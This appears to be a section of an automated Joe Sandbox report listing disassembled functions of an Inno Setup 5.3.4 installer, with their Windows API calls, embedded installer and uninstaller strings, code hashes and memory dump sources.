                                                                            Similarity
                                                                            • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                            • String ID:
                                                                            • API String ID: 2671590913-0
                                                                            • Opcode ID: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                            • Instruction ID: b8e4b42960b6b3797255afb6d30997fccd36cf0c86298b6f3b138aeb4614201e
                                                                            • Opcode Fuzzy Hash: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                            • Instruction Fuzzy Hash: 76E0E5A0300100C7EB00AFAAD8C9B9672A9BB48304F5501BABC08CF24BD6B8C8948724
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00412548 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                            • Instruction ID: 8365c716c5e730cb372343108a6f593a498c89545a1faf81556fc105b3597b40
                                                                            • Opcode Fuzzy Hash: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                            • Instruction Fuzzy Hash: 8B51D3356042059FC710DF5AD681A9BF3E5FF98304B3582ABE814C77A1D6B8AD92874C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00473A10 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00473B5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                            • Instruction ID: 3e32aa5f128dc23a8b701fa4ecba52860cdafcd953849f4bd8a959afbbddc411
                                                                            • Opcode Fuzzy Hash: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                            • Instruction Fuzzy Hash: 1F415775B08104DFCB10CF99C6819AAB7F5EB48312B24C596E848DB746D338EF41EB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B560 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B56B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            • Opcode ID: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                            • Instruction ID: 9e8eafa16c368b04bfc03e3690b6b42464bb4fe35b2110d8adbf47a9256d09ee
                                                                            • Opcode Fuzzy Hash: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                            • Instruction Fuzzy Hash: 07C09BF200520C7F65005795ECC9CB7B75CE6DC7657404126F6044210195716C508574
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B578 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,00469597), ref: 0045B57E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptFour
                                                                            • String ID:
                                                                            • API String ID: 2153018856-0
                                                                            • Opcode ID: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                            • Instruction ID: 5f2732264b6577c6f22f747bc4abd170fb833af863f4cd36b72278e664c57c22
                                                                            • Opcode Fuzzy Hash: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                            • Instruction Fuzzy Hash: E1A002B0A813057AFD6057609D0EF26262C97D4F05F2144697201E90D485A86441C52C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3216699832.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.3216683445.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3216720555.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3216699832.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.3216683445.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3216720555.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00456200 Relevance: 49.2, APIs: 11, Strings: 17, Instructions: 237filesynchronizationprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00493A74,00000001,00000000,00000000,00456535,?,?,?,00000001,?,0045674F,00000000,00456765,?,00000000,00494628), ref: 0045624D
                                                                            • CreateFileMappingA.KERNEL32(000000FF,00493A74,00000004,00000000,00002018,00000000), ref: 00456285
                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535,?,?,?), ref: 004562AC
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563B9
                                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045650B,?,00493A74,00000001,00000000,00000000,00456535), ref: 00456311
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004563D0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456409
                                                                            • GetLastError.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045641B
                                                                            • UnmapViewOfFile.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564ED
                                                                            • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004564FC
                                                                            • CloseHandle.KERNEL32(00000000,00456512,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00456505
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OgE$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp$egE
                                                                            • API String ID: 4012871263-2037318299
                                                                            • Opcode ID: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                            • Instruction ID: a20c5760107f962147a9319040fdeb0bea2bc75d6d5764986410e607720027f7
                                                                            • Opcode Fuzzy Hash: 2bd007795e1b2ddc76d7ce9a559c48c324d1643155135a6e5ac56ae879ba47b5
                                                                            • Instruction Fuzzy Hash: E9916270E002199BDB10EFA9C845B9EB7B4FB08305F91856AF814EB393D7789948CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041F088 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                            • SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                            • FreeLibrary.KERNEL32(00000001,?,00418F60,00000000,?,?,?,00000001), ref: 0041F1DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                            • API String ID: 2323315520-3614243559
                                                                            • Opcode ID: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                            • Instruction ID: 815e8fcf402ef61c9757a0b1c257229fab3912ba39737af4d7c4dcf1902ae053
                                                                            • Opcode Fuzzy Hash: 3dbd376a422217cd60190c6702d938cf0380dd97f6cabc27e0354af46de27ebb
                                                                            • Instruction Fuzzy Hash: 75311EB1600740EBDF10EFB5EC8AA653294B76E729745093BB108DB1A2D77C498ACB1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00490F4C Relevance: 35.5, APIs: 3, Strings: 17, Instructions: 486COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • InitializeUninstall, xrefs: 0049135A
                                                                            • Setup version: Inno Setup version 5.3.4 (a), xrefs: 00491024
                                                                            • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 004911A0
                                                                            • Uninstall, xrefs: 00490FD7
                                                                            • UninstallNeedRestart, xrefs: 0049149A, 004914D3
                                                                            • Will not restart Windows automatically., xrefs: 0049160E
                                                                            • Need to restart Windows? %s, xrefs: 0049153B
                                                                            • Removed all? %s, xrefs: 00491464
                                                                            • Original Uninstall EXE: , xrefs: 0049102E
                                                                            • utCompiledCode[1] is invalid, xrefs: 004911DB
                                                                            • Uninstall command line: , xrefs: 00491074
                                                                            • DeinitializeUninstall, xrefs: 004916A4
                                                                            • Will restart because UninstallNeedRestart returned True., xrefs: 004914EA
                                                                            • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 00491215
                                                                            • InitializeUninstall returned False; aborting., xrefs: 00491392
                                                                            • Uninstall DAT: , xrefs: 00491051
                                                                            • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 00491519
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$Show
                                                                            • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 5.3.4 (a)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.$utCompiledCode[1] is invalid
                                                                            • API String ID: 3609083571-540932686
                                                                            • Opcode ID: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                            • Instruction ID: 59b7c036a03d461677562de2f337d543927cbba062a10b008de86d2ad0bb5db2
                                                                            • Opcode Fuzzy Hash: 95845ce58dd33b11270f0bcad1ef958447a36d73fe786c218c0066e2c8b8b3eb
                                                                            • Instruction Fuzzy Hash: CB12A170A00645AFDB12EB66E852B5E7FB1AB55308F20847BF8009B3A2C67C9D45CB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041C97C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,0041A8B4,?), ref: 0041C9B0
                                                                            • 73A14C40.GDI32(?,00000000,?,0041A8B4,?), ref: 0041C9BC
                                                                            • 73A16180.GDI32(0041A8B4,?,00000001,00000001,00000000,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9E0
                                                                            • 73A14C00.GDI32(?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4,?), ref: 0041C9F0
                                                                            • SelectObject.GDI32(0041CDAC,00000000), ref: 0041CA0B
                                                                            • FillRect.USER32(0041CDAC,?,?), ref: 0041CA46
                                                                            • SetTextColor.GDI32(0041CDAC,00000000), ref: 0041CA5B
                                                                            • SetBkColor.GDI32(0041CDAC,00000000), ref: 0041CA72
                                                                            • PatBlt.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00FF0062), ref: 0041CA88
                                                                            • 73A14C40.GDI32(?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4,?,00000000,0041CBD2,?,?,00000000,?,0041A8B4), ref: 0041CA9B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CACC
                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?,0041A8B4), ref: 0041CAE4
                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B,?,0041CDAC,00000000,?), ref: 0041CAED
                                                                            • 73A08830.GDI32(0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CAFC
                                                                            • 73A022A0.GDI32(0041CDAC,0041CDAC,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB7A,?,?,00000000,0041CB8B), ref: 0041CB05
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CB1E
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CB35
                                                                            • 73A14D40.GDI32(0041CDAC,00000000,00000000,0041A8B4,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB7A,?,?,00000000), ref: 0041CB51
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CB5E
                                                                            • DeleteDC.GDI32(00000000), ref: 0041CB74
                                                                              • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                            • String ID:
                                                                            • API String ID: 2377543522-0
                                                                            • Opcode ID: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                            • Instruction ID: 7128b10ae0d2f5501f58bad1f60f679124a592cf14607d549707b49f1954e982
                                                                            • Opcode Fuzzy Hash: 6ab65edd8240ed20f794eacf0d63e1bb21ecde25595e2e73ad3d3ae3dbff455f
                                                                            • Instruction Fuzzy Hash: 5961FC71A44609ABDF10EBE5DC86FAFB7B8EF48704F10446AF504E7281C67CA9418B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DEBC Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memorylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DEF6
                                                                            • GetVersion.KERNEL32(00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF13
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E0A0,?,00493788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF2C
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DF32
                                                                            • FreeSid.ADVAPI32(00000000,0042E0A7,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E09A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressAllocateFreeHandleInitializeModuleProcVersion
                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                            • API String ID: 1717332306-1888249752
                                                                            • Opcode ID: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                            • Instruction ID: b47b297bded1d11ddf8dbbdf8866b420117faccba79691f7cf002b7c56945d2e
                                                                            • Opcode Fuzzy Hash: 9c2d92618089c045db7cc45444b4b39a9e3eeaabf2cdbb16aadbda0d4b0e740e
                                                                            • Instruction Fuzzy Hash: 0E51B471B44629AEDB10EAE69C42F7F77ECEB09304F94447BB500E7282C5BC9905866D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004921E8 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000,004928CB,?,00000000), ref: 0049226B
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000,?,004928C1,00000000), ref: 0049227E
                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000,00000000), ref: 0049228E
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004922AF
                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00492580,?,?,00000000,?,00000000), ref: 004922BF
                                                                              • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00491C7C,00000000,00491E45,?,?,00000005), ref: 0042D35D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                            • API String ID: 2000705611-3672972446
                                                                            • Opcode ID: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                            • Instruction ID: 3aaa1206ea96c942a1dc7cc704d64c74666df5688c5e5e951628029b4c51e49f
                                                                            • Opcode Fuzzy Hash: 06a7ed08dbf674a2667a05d703fd75933f08328fa6a844e0e79dc1aa1c7f5483
                                                                            • Instruction Fuzzy Hash: A791C330A04204BFDF11EBA5C956BAF7BA4EB49314F924477F800AB392D6BC9C05CB19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00458A2C Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00458CC6,?,?,?,?,?,00000006,?,00000000,00491717,?,00000000,004917BA), ref: 00458B78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                            • API String ID: 1452528299-1593206319
                                                                            • Opcode ID: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                            • Instruction ID: c0b81f7498e5b7e500974e5393cbc04c1f71ed909e083ee47f99453e8a5d0863
                                                                            • Opcode Fuzzy Hash: fab1801c83719b401dae8279acafb6f3c72adbd90b51be916231b55248e2b9b3
                                                                            • Instruction Fuzzy Hash: 11616C30B002445BDB11EB6998827AE7BA5AB49719F50846FF801EB383DF789D09C769
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

